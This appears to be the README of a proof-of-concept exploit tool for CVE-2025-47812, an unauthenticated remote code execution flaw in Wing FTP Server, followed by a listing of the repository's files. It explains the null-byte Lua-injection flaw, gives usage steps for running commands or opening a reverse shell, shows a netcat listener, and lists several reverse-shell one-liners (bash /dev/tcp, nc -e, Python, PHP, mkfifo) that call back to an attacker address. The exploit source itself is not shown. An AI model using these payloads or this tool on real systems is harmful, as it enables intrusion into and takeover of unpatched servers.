===========================================================
CVE-2025-47812 - Wing FTP Server Remote Code Execution (RCE)
===========================================================
Author: blindma1den
Date: July 2025
Exploit Type: Remote Code Execution (Unauthenticated)
Target: Wing FTP Server < 7.4.4
CVSS Score: 10.0 (Critical)
-----------------------------------------------------------
DESCRIPTION
-----------------------------------------------------------
This script exploits CVE-2025-47812, a critical vulnerability
in Wing FTP Server's web interface that allows remote attackers
to execute arbitrary system commands or open a reverse shell
without authentication.
The flaw is caused by improper handling of null bytes (`%00`)
in the login form (`/loginok.html`). This allows Lua code
injection into session files, which are later evaluated
when endpoints like `/dir.html` are accessed.
-----------------------------------------------------------
SOURCES
-----------------------------------------------------------
NVD Description: https://nvd.nist.gov/vuln/detail/CVE-2025-47812
-----------------------------------------------------------
FEATURES
-----------------------------------------------------------
- Command execution (e.g., `whoami`, `uname -a`)
- Multiple reverse shell payloads
- Extracts UID session cookie automatically
- Clean modular Python 3 implementation
-----------------------------------------------------------
REQUIREMENTS
-----------------------------------------------------------
- Python 3.7+
- requests module
Install dependencies:
```bash
pip install requests
```
-----------------------------------------------------------
USAGE
-----------------------------------------------------------
Run the script:
```bash
python3 wingftp_rce_exploit.py
```
You will be prompted for:
- Target URL (e.g., http://127.0.0.1:5466)
- Username (default: anonymous)
- Exploit mode:
[1] Run a command
[2] Launch reverse shell
-----------------------------------------------------------
EXAMPLES
-----------------------------------------------------------
[1] RUN COMMAND:
```text
Target URL: http://192.168.1.10:5466
Username: anonymous
Your choice (1 or 2): 1
Command to execute (default: whoami): whoami
```
[2] REVERSE SHELL:
```text
Target URL: http://192.168.1.10:5466
Username: anonymous
Your choice (1 or 2): 2
Reverse shell IP address: 192.168.1.100
Reverse shell port: 4444
```
Start your listener before triggering the shell:
```bash
nc -lvnp 4444
```
-----------------------------------------------------------
PAYLOADS USED (REVERSE SHELL)
-----------------------------------------------------------
Bash:
bash -i >& /dev/tcp/IP/PORT 0>&1
Python3:
python3 -c 'import socket,subprocess,os; ...'
Netcat:
nc IP PORT -e /bin/sh
PHP:
php -r '$sock=fsockopen("IP",PORT); ...'
FIFO + Netcat:
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|/bin/sh -i ...
-----------------------------------------------------------
DISCLAIMER
-----------------------------------------------------------
This code is for educational purposes only. Do NOT use
this exploit against systems you do not own or have explicit
authorization to test. Unauthorized use is illegal and unethical.
Patch your systems immediately. Wing FTP Server 7.4.4 resolves
this vulnerability.
Happy hacking!
[4.0K] /data/pocs/379cde5221f2fedff1737fc742bedceb200b8eca
├── [ 660] CONTRIBUTING.md
├── [4.8K] exploit.py
├── [1.1K] LICENSE.md
└── [3.2K] README.md
0 directories, 4 files